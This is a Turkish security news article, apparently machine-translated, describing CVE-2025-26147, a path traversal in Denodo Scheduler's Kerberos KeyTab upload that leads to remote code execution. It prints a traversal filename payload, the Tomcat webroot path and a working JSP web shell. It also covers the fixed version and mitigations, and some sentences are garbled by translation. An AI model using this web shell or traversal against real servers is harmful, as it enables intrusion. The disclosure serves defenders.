Mantıksal veri yönetimi yazılımı sağlayıcısı olan Denodo, yakın zamanda Denodo zamanlayıcı ürününde kritik bir güvenlik açığı ile karşılaştı.
CVE-2025-26147 olarak izlenen bu güvenlik açığı, kimlik doğrulamalı kullanıcıların etkilenen sistemlerde uzaktan kod yürütme (RCE) gerçekleştirmesine izin vererek, veri çıkarma ve entegrasyon işleri için bu zamanlama aracına dayanan kuruluşlar için önemli riskler oluşturmaktadır.
Denodo zamanlayıcısına giriş ve güvenlik açığı
Denodo Scheduler, Denodo Virtual DataPort sunucularındaki veri çıkarma ve entegrasyon görevlerini otomatikleştirmek ve yönetmek için tasarlanmış Java tabanlı bir web uygulamasıdır.
.png
)
Toplu işlerin zamanlamasını, ayrıntılı yürütme raporlarının oluşturulmasını, sonuçları çeşitli formatlara dışa aktarmayı ve şifreler olmadan bilet ve simetrik anahtar kriptografisi kullanan güvenli bir ağ protokolü olan Kerberos kimlik doğrulaması da dahil olmak üzere kimlik doğrulama yapılandırmalarının işlenmesini destekler.
Güvenlik açığı, yöneticilerin kimlik doğrulaması için Kerberos KeyTab dosyalarını yüklemesine izin veren zamanlayıcının özelliğinde ortaya çıkar.
KeyTab Dosyaları Şifreli hizmet ana kimlik bilgilerini, şifresiz kimlik doğrulamasını etkinleştirerek depolar.
Bu dosyaları yüklemek için kullanılan HTTP isteği, içerik dispozisyon başlıktaki dosya adı parametresi bir yol geçiş saldırısına duyarlı olduğu çok partili bir form veri sonrası isteğidir.
Bu saldırı, dizinleri geçmek ve amaçlanan yükleme dizininin dışında dosyaları yazmak için “../” gibi dizileri kullanarak dosya adı değerini manipüle eder.
Örneğin, bir saldırgan aşağıdakiler gibi bir dosya adı oluşturabilir:
textfilename="../../../../opt/denodo/malicious.file.txt"
Denodo Scheduler, yüklenen dosya adına bir zaman damgası eklemesine rağmen (örn., malicious.file-1711156561716.txtTam dosya adı, HTTP yanıtında döndürülür ve saldırganların zaman damgasını tahmin etmeden dosyayı bulmasını sağlar.
RCE için güvenlik açığından yararlanmak
Sunucunun dosya sisteminde herhangi bir yere keyfi dosyalar yazma olanağı ile saldırganlar, uzaktan kod yürütülmesini sağlamak için bu güvenlik açığını artırabilir.
Denodo Scheduler, JavaServer sayfalarını (JSP) yürüten Java tabanlı bir HTTP web sunucusu ortamı olan Apache Tomcat Server’da çalışır.
Saldırganlar, Tomcat Web Kök Dizini’ne kötü amaçlı bir JSP web kabuğu yükleyebilir, genellikle şu adreste bulunur:
text/path/to/webroot/resources/apache-tomcat/webapps/ROOT/
HTTP GET parametresi aracılığıyla iletilen komutları yürüten basit bir Java Web kabuğu örneği cmd ::
text<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
Process p = Runtime.getRuntime().exec(cmd);
java.io.InputStream is = p.getInputStream();
java.util.Scanner s = new java.util.Scanner(is).useDelimiter("\\A");
String output = s.hasNext() ? s.next() : "";
response.getWriter().println(output);
}
%>
Yüklendikten sonra, bu web kabuğu, istenen komutla kabuk URL’sine erişerek sistem komutlarının uzaktan yürütülmesine izin verir, örneğin id Kullanıcı kimlik bilgilerini almak için.
Teknik özet ve azaltma
| Bakış açısı | Detaylar |
|---|---|
| Satıcı | Denodo |
| Ürün | Denodo zamanlayıcı |
| Savunmasız sürüm | v8.0.202309140 |
| Sabit versiyon | Denodo 8.0 Güncellemesi: DeNODO-V80-UPDATE-20240307 |
| Güvenlik Açığı Türü | Yol geçişi, kimliği doğrulanmış uzaktan kod yürütmeye yol açan (CVE-2025-26147) |
| Saldırı vektörü | ÇOKLU Form Veri Gönderme İsteği Yükleme Kerberos KeyTab dosyalarını hazırlanmış dosya adıyla |
| Etkilenen bileşen | Kerberos Kimlik Doğrulaması KeyTab Dosya Yükleme Özelliği |
| Altında yatan sunucu | Apache Tomcat |
| Yük yükü | Java JSP Web Kabası, HTTP Get Parametresi aracılığıyla komut yürütmeye izin veren |
| Azaltma | Sabit Denodo Zamanlayıcı sürümüne yükseltme; dosya yükleme yollarını kısıtlamak; dosya adlarını doğrulayın |
Güvenlik açığı, güvenlik araştırmacıları John de Armas ve Morgan Backus tarafından sorumlu bir şekilde açıklandı ve Denodo, bir güvenlik güncellemesi yayınlayarak derhal yanıt verdi. sorun.
Bu olay, dosya yükleme işlemesindeki görünüşte küçük bir kusurun kritik bir uzaktan kod yürütme kırılganlığına nasıl yükselebileceğini ve kurumsal veri hizmetlerinin gizliliğini, bütünlüğünü ve kullanılabilirliğini tehdit edebileceğini vurgulamaktadır.
Güvenli kodlama uygulamalarının gerekliliğini, titiz giriş validasyonunu ve yazılım geliştirme ve dağıtımda zamanında yamayı vurgular.
Denodo Scheduler kullanan kuruluşların sabit sürüme (DeNODO-V80-Update-20240307) hemen yükseltmeleri ve sömürü önlemek için sunucu yapılandırmalarını gözden geçirmeleri şiddetle tavsiye edilir.
Güvenlik danışmanları aracılığıyla bilgilendirilmek ve kimlik doğrulama ve dosya işleme alanındaki en iyi uygulamaları takip etmek, bu tür tehditlere karşı hayati savunmalar olmaya devam etmektedir.
Devam eden güncellemeler ve güvenlik araştırmaları için Twitter ve LinkedIn’deki Rhino Güvenlik Laboratuarlarını takip edin.
Bu makale, Rhino Security Labs ve Denodo Topluluk Belgeleri tarafından yapılan ayrıntılı araştırma ve analizlere dayanmaktadır.
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!